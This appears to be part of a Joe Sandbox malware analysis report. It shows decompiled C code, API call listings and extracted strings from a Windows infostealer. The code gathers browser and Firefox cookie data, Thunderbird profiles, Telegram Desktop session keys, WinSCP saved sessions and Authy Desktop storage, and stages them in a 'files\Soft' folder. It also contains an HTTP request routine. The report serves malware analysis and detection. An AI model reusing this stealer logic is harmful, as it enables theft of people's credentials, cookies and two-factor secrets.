                                                                                				E004137F9(_t92, _t118, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449c08);
                                                                                				_t119 =  *0x449eb4; // 0x14a1198
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t119, _t133, _t141, _t143, _t148);
                                                                                				_push( *0x449f70);
                                                                                				_t120 =  *0x449b64; // 0x14a0e50
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, _t120, _t133, _t141, _t143, _t148);
                                                                                				_push("CryptoTab Browser");
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, "\\CryptoTab Browser\\User Data\\", _t133, _t141, _t143, _t148);
                                                                                				_push("Brave");
                                                                                				_push(_t143);
                                                                                				E004137F9(_t92, "\\BraveSoftware\\Brave-Browser\\User Data\\", _t133, _t141, _t143, _t148);
                                                                                				_t93 = 0;
                                                                                				_t149 =  *_t143;
                                                                                				if( *_t143 != 0) {
                                                                                					_t132 = _t143;
                                                                                					E004118A4(0, _t143, _t133, _t141, _t143, _t149);
                                                                                					_t150 =  *_t143;
                                                                                					if( *_t143 != 0) {
                                                                                						E004126BD(0, _t132, _t133, _t141, _t143, _t150);
                                                                                						E004112DA(0, _t132, _t133, _t141, _t143, _t150);
                                                                                						_t141 = "\\Thunderbird\\Profiles\\";
                                                                                						E00413D67(_t143, _t133, "\\Thunderbird\\Profiles\\", _t150, "Thunderbird");
                                                                                						_t93 = 0;
                                                                                					}
                                                                                				}
                                                                                				_t152 =  *((intOrPtr*)(_t143 + 5)) - _t93;
                                                                                				if( *((intOrPtr*)(_t143 + 5)) != _t93) {
                                                                                					_push( *0x449bb4);
                                                                                					_t142 = _t143 + 8;
                                                                                					_push( &_v304);
                                                                                					_t71 = E0040D337(_t93, _t143 + 8, _t143, _t152);
                                                                                					_t153 = _t71[0x14] - 0x10;
                                                                                					if(_t71[0x14] >= 0x10) {
                                                                                						_t71 =  *_t71;
                                                                                					}
                                                                                					CreateDirectoryA(_t71, _t93);
                                                                                					E00402C34( &_v304, 1, _t93);
                                                                                					E00427E30( &_v276, _t93, 0x104);
                                                                                					 *0x44a1b8( &_v276, E0041F644(_t93, _t142, _t143, _t153), "APPDATA");
                                                                                					 *0x44a1b8( &_v276, "\\Telegram Desktop\\");
                                                                                					_push("key_datas");
                                                                                					_push( &_v276);
                                                                                					_t141 = 0x43e028;
                                                                                					_push(0x43e028);
                                                                                					E00411E67(_t93, _t143, 0x43e028, _t143, _t153);
                                                                                					_push("D877F783D5D3EF8C*");
                                                                                					_push( &_v276);
                                                                                					_push(0x43e028);
                                                                                					E00411E67(_t93, _t143, 0x43e028, _t143, _t153);
                                                                                					_push("map*");
                                                                                					_push( &_v276);
                                                                                					_push(0x43e028);
                                                                                					E00411E67(_t93, _t143, 0x43e028, _t143, _t153);
                                                                                				}
                                                                                				_t67 =  *0x44a08c; // 0x0
                                                                                				 *((intOrPtr*)(_t143 + 0x28)) = _t67;
                                                                                				_t68 =  *0x44a098; // 0x0
                                                                                				 *((intOrPtr*)(_t143 + 0x2c)) = _t68;
                                                                                				return E0041DEB4(_t68, _t93, _v8 ^ _t144, _t133, _t141, _t143);
                                                                                			}


                                                                                APIs
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                  • Part of subcall function 00413D67: _memset.LIBCMT ref: 00413D93
                                                                                  • Part of subcall function 00413D67: _memset.LIBCMT ref: 00413DA5
                                                                                  • Part of subcall function 00413D67: lstrcat.KERNEL32(?,014A10F8), ref: 00413DC4
                                                                                  • Part of subcall function 00413D67: lstrcat.KERNEL32(?,?), ref: 00413DD8
                                                                                  • Part of subcall function 00413D67: lstrcat.KERNEL32(?,..\profiles.ini), ref: 00413DEA
                                                                                  • Part of subcall function 00413D67: GetFileAttributesA.KERNEL32(?,?,?,?,?,?,?), ref: 00413DF7
                                                                                  • Part of subcall function 00413D67: FreeLibrary.KERNEL32(?,?,?,?,?,?), ref: 00413E2E
                                                                                  • Part of subcall function 004139E8: __EH_prolog3_GS.LIBCMT ref: 004139F2
                                                                                  • Part of subcall function 004139E8: _memset.LIBCMT ref: 00413A2E
                                                                                  • Part of subcall function 004139E8: _memset.LIBCMT ref: 00413A3F
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,\Opera Software\), ref: 00413A63
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,?), ref: 00413A76
                                                                                  • Part of subcall function 004139E8: StrCmpCA.SHLWAPI(?,\Opera Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413A8D
                                                                                  • Part of subcall function 004139E8: StrCmpCA.SHLWAPI(?,\Opera GX Stable\,?,?,?,00414013,?,\Opera Stable\,?,?,?,?,00000000), ref: 00413AAC
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,\Opera Software\), ref: 00413AD7
                                                                                  • Part of subcall function 004139E8: _memset.LIBCMT ref: 00413AE6
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,?), ref: 00413AFC
                                                                                  • Part of subcall function 004139E8: lstrcat.KERNEL32(?,\Local State), ref: 00413B0E
                                                                                  • Part of subcall function 004139E8: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413B6D
                                                                                  • Part of subcall function 004137F9: __EH_prolog3_GS.LIBCMT ref: 00413803
                                                                                  • Part of subcall function 004137F9: _memset.LIBCMT ref: 00413838
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?), ref: 00413857
                                                                                  • Part of subcall function 004137F9: _memset.LIBCMT ref: 00413866
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?,?), ref: 0041387C
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?,00440C98), ref: 0041388E
                                                                                  • Part of subcall function 004137F9: lstrcat.KERNEL32(?), ref: 004138A1
                                                                                  • Part of subcall function 004137F9: GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 00413900
                                                                                • CreateDirectoryA.KERNEL32(00000000,00000000,Brave,?,CryptoTab Browser,?,?,?,?,?,?,?,?,?,?,?), ref: 00414270
                                                                                • _memset.LIBCMT ref: 00414291
                                                                                • __wgetenv.LIBCMT ref: 0041429E
                                                                                • lstrcat.KERNEL32(?,00000000), ref: 004142AC
                                                                                • lstrcat.KERNEL32(?,\Telegram Desktop\), ref: 004142BE
                                                                                  • Part of subcall function 004118A4: __EH_prolog3_GS.LIBCMT ref: 004118AE
                                                                                  • Part of subcall function 004118A4: __wgetenv.LIBCMT ref: 004118C0
                                                                                  • Part of subcall function 004118A4: CreateDirectoryA.KERNEL32(00000000,00000000,?,?,?,?,?,\Opera GX Stable\,?,\Opera Stable\,?,?,?,?,00000000), ref: 0041196E
                                                                                  • Part of subcall function 004118A4: CreateDirectoryA.KERNEL32(00000000,00000000,00000001,00000000,?,?,?,?,00000000), ref: 00411995
                                                                                  • Part of subcall function 004126BD: __EH_prolog3_GS.LIBCMT ref: 004126C7
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 004126E7
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 0041270D
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 00412724
                                                                                  • Part of subcall function 004126BD: _memset.LIBCMT ref: 0041273B
                                                                                  • Part of subcall function 004126BD: RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041276D
                                                                                  • Part of subcall function 004126BD: RegGetValueW.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?,?,?,?,?,?,?,?,00000000,000003FF), ref: 0041279C
                                                                                  • Part of subcall function 004126BD: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127B4
                                                                                  • Part of subcall function 004126BD: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127D6
                                                                                  • Part of subcall function 004126BD: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?,\Opera Stable\), ref: 004127F0
                                                                                  • Part of subcall function 004126BD: RegOpenKeyExW.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,00000000,000003FF,\Opera GX Stable\,?), ref: 0041280C
                                                                                  • Part of subcall function 004126BD: RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00412833
                                                                                  • Part of subcall function 004112DA: __EH_prolog3_GS.LIBCMT ref: 004112E4
                                                                                  • Part of subcall function 004112DA: GetFileAttributesW.KERNEL32(00000000,?,?,?,?,?,?,\Opera Stable\,?,?,?,?,00000000), ref: 00411342
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$_memset$H_prolog3_$AttributesFile$CloseCreateDirectory$Open__wgetenv$EnumFreeLibraryValue__fsopen
                                                                                • String ID: (C$APPDATA$Brave$CryptoTab Browser$D877F783D5D3EF8C*$Thunderbird$\BraveSoftware\Brave-Browser\User Data\$\CryptoTab Browser\User Data\$\Opera GX Stable\$\Opera Stable\$\Telegram Desktop\$\Thunderbird\Profiles\$key_datas$map*
                                                                                • API String ID: 427378461-2264012513
                                                                                • Opcode ID: 004eba26986d889edde72328b28cdcc458ef68f0c4da6b7fafd52e41a136ae5e
                                                                                • Instruction ID: e62858a9285edcc07832d07c2c104f7599a17e1253ef58cd06f48dcf41d5a719
                                                                                • Opcode Fuzzy Hash: 004eba26986d889edde72328b28cdcc458ef68f0c4da6b7fafd52e41a136ae5e
                                                                                • Instruction Fuzzy Hash: 6B915EBD500510ABCB05EF61ED82CDB377ABB4B305750402EF521522A2DF792E91EB9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                APIs
                                                                                • GetCurrentDirectoryA.KERNEL32(00000104,?,?,(>A(C,?), ref: 00410A2E
                                                                                • lstrcat.KERNEL32(?,\temp), ref: 00410A40
                                                                                • CopyFileA.KERNEL32 ref: 00410A50
                                                                                • _memset.LIBCMT ref: 00410A5D
                                                                                • wsprintfA.USER32 ref: 00410A6F
                                                                                • DeleteFileA.KERNEL32(?), ref: 00410BF9
                                                                                  • Part of subcall function 00420300: __fsopen.LIBCMT ref: 0042030D
                                                                                • StrCmpCA.SHLWAPI(00000000,00440C64), ref: 00410B4A
                                                                                • lstrcat.KERNEL32(00000000,FALSE), ref: 00410B66
                                                                                • StrCmpCA.SHLWAPI(?,00440C64), ref: 00410B71
                                                                                • lstrcat.KERNEL32(?,FALSE), ref: 00410B8D
                                                                                • _fprintf.LIBCMT ref: 00410BAE
                                                                                • _fprintf.LIBCMT ref: 00410BBB
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcat$File_fprintf$CopyCurrentDeleteDirectory__fsopen_memsetwsprintf
                                                                                • String ID: %s%s%s%s%s%s%s$(>A(C$Cookies\%s_%s.txt$FALSE$SELECT host, isHttpOnly, path, isSecure, expiry, name, value FROM moz_cookies$TRUE$\temp
                                                                                • API String ID: 3836584492-4065151876
                                                                                • Opcode ID: 62140644920e53098d55f411989acb5e5721357ba7e37a48b30fe07a6ec2e481
                                                                                • Instruction ID: e50756961954b06cde412c856eb40ff3872ee28e5f922a0ee226e980f5d0c950
                                                                                • Opcode Fuzzy Hash: 62140644920e53098d55f411989acb5e5721357ba7e37a48b30fe07a6ec2e481
                                                                                • Instruction Fuzzy Hash: 09515D35940318AFEF219FF0DC49EDEBB79EF09704F100026F609AB160DB7999A48B19
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 23%
                                                                                			E0040ED7D(char* __ecx, void* __edx) {
                                                                                				void* __ebx;
                                                                                				void* __edi;
                                                                                				void* __esi;
                                                                                				signed int _t32;
                                                                                				void* _t37;
                                                                                				void* _t44;
                                                                                				char* _t57;
                                                                                				void* _t63;
                                                                                				void* _t67;
                                                                                				void* _t69;
                                                                                				void* _t70;
                                                                                				void* _t71;
                                                                                				char* _t73;
                                                                                				void* _t74;
                                                                                				void* _t75;
                                                                                				signed int _t77;
                                                                                				void* _t79;
                                                                                
                                                                                				_t67 = __edx;
                                                                                				_t77 = _t79 - 0x6a10;
                                                                                				E00430D40(0x6a90);
                                                                                				_t32 =  *0x447674; // 0x4124c941
                                                                                				 *(_t77 + 0x6a0c) = _t32 ^ _t77;
                                                                                				 *(_t77 - 0x70) =  *(_t77 + 0x6a18);
                                                                                				_t73 = __ecx;
                                                                                				E00427E30(_t77 - 0x6c, 0, 0x61a8);
                                                                                				_t37 = InternetOpenA(0x43e028, 0, 0, 0, 0);
                                                                                				_push("https://");
                                                                                				_push("http://");
                                                                                				 *(_t77 - 0x74) = _t37;
                                                                                				 *(_t77 - 0x80) = 0x100;
                                                                                				_t69 = 0;
                                                                                				if( *0x44a1d8() == 0) {
                                                                                					_t69 = 1;
                                                                                				}
                                                                                				if( *(_t77 - 0x74) != 0) {
                                                                                					 *(_t77 - 0x7c) = 0x927c0;
                                                                                					InternetSetOptionA( *(_t77 - 0x74), 6, _t77 - 0x7c, 4);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					_push(3);
                                                                                					_push(0);
                                                                                					_push(0);
                                                                                					if(_t69 == 0) {
                                                                                						_push(0x50);
                                                                                					} else {
                                                                                						_push(0x1bb);
                                                                                					}
                                                                                					_t44 = InternetConnectA( *(_t77 - 0x74), _t73, ??, ??, ??, ??, ??, ??);
                                                                                					 *(_t77 - 0x78) = _t44;
                                                                                					if(_t44 != 0) {
                                                                                						_push(0);
                                                                                						if(_t69 == 0) {
                                                                                							_push(0x4400100);
                                                                                						} else {
                                                                                							_push(0x4c00100);
                                                                                						}
                                                                                						_t71 = HttpOpenRequestA( *(_t77 - 0x78), "GET",  *(_t77 - 0x70), 0, 0, 0, ??, ??);
                                                                                						if(_t71 != 0) {
                                                                                							_t75 = 0;
                                                                                							do {
                                                                                								HttpSendRequestA(_t71, 0, 0, 0, 0);
                                                                                								if(HttpQueryInfoA(_t71, 0x13, _t77 + 0x690c, _t77 - 0x80, 0) == 0) {
                                                                                									goto L14;
                                                                                								} else {
                                                                                									_push("200");
                                                                                									_push(_t77 + 0x690c);
                                                                                									if( *0x44a1d8() == 0) {
                                                                                										while(InternetReadFile(_t71, _t77 + 0x613c, 0x7cf, _t77 - 0x70) != 0) {
                                                                                											_t57 =  *(_t77 - 0x70);
                                                                                											if(_t57 != 0) {
                                                                                												( &(_t57[0x613c]))[_t77] = 0;
                                                                                												 *0x44a1b8(_t77 - 0x6c, _t77 + 0x613c);
                                                                                												continue;
                                                                                											}
                                                                                											goto L20;
                                                                                										}
                                                                                									} else {
                                                                                										goto L14;
                                                                                									}
                                                                                								}
                                                                                								goto L20;
                                                                                								L14:
                                                                                								Sleep(0x7530);
                                                                                								_t75 = _t75 + 1;
                                                                                							} while (_t75 < 6);
                                                                                						}
                                                                                						L20:
                                                                                						InternetCloseHandle(_t71);
                                                                                					}
                                                                                					InternetCloseHandle( *(_t77 - 0x78));
                                                                                				}
                                                                                				InternetCloseHandle( *(_t77 - 0x74));
                                                                                				_pop(_t70);
                                                                                				_pop(_t74);
                                                                                				_pop(_t63);
                                                                                				return E0041DEB4(_t77 - 0x6c, _t63,  *(_t77 + 0x6a0c) ^ _t77, _t67, _t70, _t74);
                                                                                			}

                                                                                APIs
                                                                                • _memset.LIBCMT ref: 0040EDB6
                                                                                • InternetOpenA.WININET(0043E028,00000000,00000000,00000000,00000000), ref: 0040EDC7
                                                                                • StrCmpCA.SHLWAPI(http://,https://,?,?,?,?,?,00000013), ref: 0040EDE3
                                                                                • InternetSetOptionA.WININET(?,00000006,?,00000004), ref: 0040EE09
                                                                                • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,00000000), ref: 0040EE26
                                                                                • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,00000000,04400100,00000000), ref: 0040EE56
                                                                                • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040EE6D
                                                                                • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 0040EE82
                                                                                • StrCmpCA.SHLWAPI(?,200,?,00000050,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00000013), ref: 0040EE98
                                                                                • Sleep.KERNEL32(00007530,?,00000050,00000000,00000000,00000003,00000000,00000000,?,?,?,?,?,00000013), ref: 0040EEA7
                                                                                • lstrcat.KERNEL32(?,?), ref: 0040EED5
                                                                                • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0040EEE8
                                                                                • InternetCloseHandle.WININET(00000000), ref: 0040EEF3
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EEFC
                                                                                • InternetCloseHandle.WININET(?), ref: 0040EF05
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.508134616.0000000000401000.00000020.00000800.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000011.00000002.508071026.0000000000400000.00000004.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508553969.0000000000438000.00000002.00000800.00020000.00000000.sdmp
                                                                                • Associated: 00000011.00000002.508645863.0000000000447000.00000004.00000800.00020000.00000000.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_file_22613.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Internet$CloseHandleHttp$OpenRequest$ConnectFileInfoOptionQueryReadSendSleep_memsetlstrcat
                                                                                • String ID: 200$GET$http://$https://
                                                                                • API String ID: 692990806-2803709044
                                                                                • Opcode ID: aabdaf97c9838ac05667adc0d8fb00d79d65b6a4f4fdabcdc8c3886a3daa7684
                                                                                • Instruction ID: 94b9f3f1bd54328b4ef323db83b1745eed844341cd3dac8c496b72eae20b6dd8
                                                                                • Opcode Fuzzy Hash: aabdaf97c9838ac05667adc0d8fb00d79d65b6a4f4fdabcdc8c3886a3daa7684
                                                                                • Instruction Fuzzy Hash: 1341BE72A4021CAFEB209FA1DC88EAF7B6DEB09744F14043AF602F6191D6755D209F69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 86%
                                                                                			E004118A4(void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                				void* _t166;
                                                                                				struct _SECURITY_ATTRIBUTES* _t171;
                                                                                				intOrPtr _t175;
                                                                                				struct _SECURITY_ATTRIBUTES* _t177;
                                                                                				intOrPtr _t184;
                                                                                				CHAR* _t188;
                                                                                				CHAR* _t192;
                                                                                				void* _t198;
                                                                                				void* _t205;
                                                                                				void* _t214;
                                                                                				WCHAR* _t215;
                                                                                				CHAR* _t239;
                                                                                				CHAR* _t243;
                                                                                				void* _t249;
                                                                                				void* _t256;
                                                                                				void* _t265;
                                                                                				WCHAR* _t266;
                                                                                				struct _SECURITY_ATTRIBUTES* _t285;
                                                                                				struct _SECURITY_ATTRIBUTES _t291;
                                                                                				struct _SECURITY_ATTRIBUTES _t294;
                                                                                				WCHAR* _t356;
                                                                                				WCHAR* _t369;
                                                                                				void* _t379;
                                                                                				void* _t380;
                                                                                				struct _SECURITY_ATTRIBUTES* _t381;
                                                                                				struct _SECURITY_ATTRIBUTES* _t382;
                                                                                				void* _t383;
                                                                                				intOrPtr _t385;
                                                                                				intOrPtr _t394;
                                                                                
                                                                                				_t383 = __eflags;
                                                                                				_t338 = __edx;
                                                                                				_push(0x194);
                                                                                				E004219DE(E00436F2F, __ebx, __edi, __esi);
                                                                                				_t353 = __ecx;
                                                                                				_push("APPDATA");
                                                                                				 *((intOrPtr*)(_t379 - 0x19c)) = __ecx;
                                                                                				_t166 = E0041F644(__ebx, __edi, __ecx, _t383);
                                                                                				 *((intOrPtr*)(_t379 - 0x34)) = 0xf;
                                                                                				 *((intOrPtr*)(_t379 - 0x38)) = 0;
                                                                                				 *((char*)(_t379 - 0x48)) = 0;
                                                                                				E0040381A(_t379 - 0x48, _t166);
                                                                                				_t381 = _t380 - 0x1c;
                                                                                				 *((intOrPtr*)(_t379 - 4)) = 0;
                                                                                				 *(_t379 - 0x188) = _t381;
                                                                                				_push("\\Authy Desktop\\Local Storage\\*.localstorage");
                                                                                				_push(_t381);
                                                                                				E0040D337(0, _t379 - 0x48, _t353, _t383);
                                                                                				_t283 = _t379 - 0x198;
                                                                                				E0041778D(_t379 - 0x198, _t379 - 0x48, _t353, _t383);
                                                                                				 *((char*)(_t379 - 4)) = 1;
                                                                                				_t171 =  *(_t379 - 0x194);
                                                                                				_t291 =  *(_t379 - 0x198);
                                                                                				 *(_t379 - 0x188) = _t171;
                                                                                				 *(_t379 - 0x180) = _t291;
                                                                                				if(_t291 != _t171) {
                                                                                					_t366 = _t353 + 8;
                                                                                					_t385 = _t366;
                                                                                					 *((intOrPtr*)(_t379 - 0x184)) = _t366;
                                                                                					do {
                                                                                						E0040E243(_t379 - 0x80,  *(_t379 - 0x180));
                                                                                						_t347 =  *((intOrPtr*)(_t379 - 0x184));
                                                                                						_push("\\files\\Soft");
                                                                                						_push(_t379 - 0x2c);
                                                                                						 *((char*)(_t379 - 4)) = 2;
                                                                                						_t239 = E0040D337(_t283,  *((intOrPtr*)(_t379 - 0x184)), _t366, _t385);
                                                                                						_t386 = _t239[0x14] - 0x10;
                                                                                						if(_t239[0x14] >= 0x10) {
                                                                                							_t239 =  *_t239;
                                                                                						}
                                                                                						_t283 = 0;
                                                                                						CreateDirectoryA(_t239, 0);
                                                                                						E00402C34(_t379 - 0x2c, 1, 0);
                                                                                						_push("\\files\\Soft\\Authy");
                                                                                						_push(_t379 - 0x2c);
                                                                                						_t243 = E0040D337(0, _t347, CreateDirectoryA, _t386);
                                                                                						_t387 = _t243[0x14] - 0x10;
                                                                                						if(_t243[0x14] >= 0x10) {
                                                                                							_t243 =  *_t243;
                                                                                						}
                                                                                						CreateDirectoryA(_t243, _t283);
                                                                                						E00402C34(_t379 - 0x2c, 1, _t283);
                                                                                						 *((intOrPtr*)(_t379 - 0x18)) = 0xf;
                                                                                						 *(_t379 - 0x1c) = _t283;
                                                                                						 *(_t379 - 0x2c) = _t283;
                                                                                						E00403A16(_t379 - 0x2c, _t387, "files\\Soft\\Authy", 0x10);
                                                                                						 *((char*)(_t379 - 4)) = 3;
                                                                                						_t249 = E004175C4(_t379 - 0x2c, _t379 - 0x64);
                                                                                						 *((char*)(_t379 - 4)) = 4;
                                                                                						E004175C4( *((intOrPtr*)(_t379 - 0x184)), _t379 - 0x160);
                                                                                						 *((char*)(_t379 - 4)) = 5;
                                                                                						E0040E32E(_t338);
                                                                                						_t338 = _t379 - 0x144;
                                                                                						 *((char*)(_t379 - 4)) = 6;
                                                                                						E0040E34B(_t249, _t379 - 0x144);
                                                                                						 *((char*)(_t379 - 4)) = 7;
                                                                                						_t256 = E0040E32E(_t379 - 0x144);
                                                                                						 *((char*)(_t379 - 4)) = 8;
                                                                                						_t369 = E0040E2B0(_t379 - 0xf0, _t379 - 0x80, _t256, _t379 - 0x80);
                                                                                						 *((char*)(_t379 - 4)) = 9;
                                                                                						 *((intOrPtr*)(_t379 - 0x1a0)) = E00417554(_t379 - 0x80, _t379 - 0x144, _t379 - 0xd4);
                                                                                						_push("\\Authy Desktop\\Local Storage\\");
                                                                                						_push(_t379 - 0xb8);
                                                                                						 *((char*)(_t379 - 4)) = 0xa;
                                                                                						E0040D337(_t283, _t379 - 0x48, _t369, _t387);
                                                                                						 *((char*)(_t379 - 4)) = 0xb;
                                                                                						_t265 = E0040D431( *((intOrPtr*)(_t379 - 0x1a0)), _t379 - 0x128);
                                                                                						 *((char*)(_t379 - 4)) = 0xc;
                                                                                						_t266 = E004175C4(_t265, _t379 - 0x9c);
                                                                                						if(_t369[0xa] >= 8) {
                                                                                							_t369 =  *_t369;
                                                                                						}
                                                                                						if(_t266[0xa] >= 8) {
                                                                                							_t266 =  *_t266;
                                                                                						}
                                                                                						CopyFileW(_t266, _t369, 1);
                                                                                						E00403960(0, _t379 - 0x9c, 1);
                                                                                						E00402C34(_t379 - 0x128, 1, _t283);
                                                                                						E00402C34(_t379 - 0xb8, 1, _t283);
                                                                                						E00402C34(_t379 - 0xd4, 1, _t283);
                                                                                						E00403960(0, _t379 - 0xf0, 1);
                                                                                						E00403960(0, _t379 - 0x10c, 1);
                                                                                						E00403960(0, _t379 - 0x144, 1);
                                                                                						E00403960(0, _t379 - 0x17c, 1);
                                                                                						E00403960(0, _t379 - 0x160, 1);
                                                                                						E00403960(0, _t379 - 0x64, 1);
                                                                                						E00402C34(_t379 - 0x2c, 1, _t283);
                                                                                						_t366 = _t379 - 0x80;
                                                                                						 *((char*)(_t379 - 4)) = 1;
                                                                                						E00403960(0, _t379 - 0x80, 1);
                                                                                						 *(_t379 - 0x180) =  *(_t379 - 0x180) + 0x1c;
                                                                                						_t390 =  *(_t379 - 0x180) -  *(_t379 - 0x188);
                                                                                					} while ( *(_t379 - 0x180) !=  *(_t379 - 0x188));
                                                                                				}
                                                                                				_t382 = _t381 - 0x1c;
                                                                                				 *(_t379 - 0x188) = _t382;
                                                                                				_push("\\Authy Desktop\\Local Storage\\leveldb\\*");
                                                                                				_push(_t382);
                                                                                				E0040D337(_t283, _t379 - 0x48, _t353, _t390);
                                                                                				_t342 = E0041778D(_t379 - 0x20, _t379 - 0x48, _t353, _t390);
                                                                                				_t175 = _t379 - 0x198;
                                                                                				if(_t175 == _t342) {
                                                                                					_t285 = 0;
                                                                                					__eflags = 0;
                                                                                				} else {
                                                                                					_t353 = _t175;
                                                                                					E0040E26D(_t175);
                                                                                					 *(_t379 - 0x198) = _t342->nLength;
                                                                                					 *(_t379 - 0x194) = _t342->lpSecurityDescriptor;
                                                                                					_t285 = 0;
                                                                                					 *(_t379 - 0x190) = _t342->bInheritHandle;
                                                                                					 *_t342 = 0;
                                                                                					_t342->lpSecurityDescriptor = 0;
                                                                                					_t342->bInheritHandle = 0;
                                                                                				}
                                                                                				 *((char*)(_t379 - 4)) = 1;
                                                                                				_t176 =  *((intOrPtr*)(_t379 - 0x20));
                                                                                				if( *((intOrPtr*)(_t379 - 0x20)) != _t285) {
                                                                                					E0040E28F(_t176,  *(_t379 - 0x1c));
                                                                                					_push( *((intOrPtr*)(_t379 - 0x20)));
                                                                                					E0041DFFD();
                                                                                				}
                                                                                				_t177 =  *(_t379 - 0x194);
                                                                                				_t294 =  *(_t379 - 0x198);
                                                                                				 *(_t379 - 0x188) = _t177;
                                                                                				 *(_t379 - 0x180) = _t294;
                                                                                				if(_t294 != _t177) {
                                                                                					_t184 =  *((intOrPtr*)(_t379 - 0x19c)) + 8;
                                                                                					_t394 = _t184;
                                                                                					 *((intOrPtr*)(_t379 - 0x184)) = _t184;
                                                                                					do {
                                                                                						E0040E243(_t379 - 0x80,  *(_t379 - 0x180));
                                                                                						_t343 =  *((intOrPtr*)(_t379 - 0x184));
                                                                                						_push("\\files\\Soft");
                                                                                						_push(_t379 - 0x64);
                                                                                						 *((char*)(_t379 - 4)) = 0x10;
                                                                                						_t188 = E0040D337(_t285,  *((intOrPtr*)(_t379 - 0x184)), _t353, _t394);
                                                                                						_t395 = _t188[0x14] - 0x10;
                                                                                						if(_t188[0x14] >= 0x10) {
                                                                                							_t188 =  *_t188;
                                                                                						}
                                                                                						CreateDirectoryA(_t188, _t285);
                                                                                						E00402C34(_t379 - 0x64, 1, _t285);
                                                                                						_push("\\files\\Soft\\AuthyNew");
                                                                                						_push(_t379 - 0x64);
                                                                                						_t192 = E0040D337(_t285, _t343, CreateDirectoryA, _t395);
                                                                                						_t396 = _t192[0x14] - 0x10;
                                                                                						if(_t192[0x14] >= 0x10) {
                                                                                							_t192 =  *_t192;
                                                                                						}
                                                                                						CreateDirectoryA(_t192, _t285);
                                                                                						E00402C34(_t379 - 0x64, 1, _t285);
                                                                                						 *((intOrPtr*)(_t379 - 0x18)) = 0xf;
                                                                                						 *(_t379 - 0x1c) = _t285;
                                                                                						 *(_t379 - 0x2c) = _t285;
                                                                                						E00403A16(_t379 - 0x2c, _t396, "files\\Soft\\AuthyNew", 0x13);
                                                                                						 *((char*)(_t379 - 4)) = 0x11;
                                                                                						_t198 = E004175C4(_t379 - 0x2c, _t379 - 0x9c);
                                                                                						 *((char*)(_t379 - 4)) = 0x12;
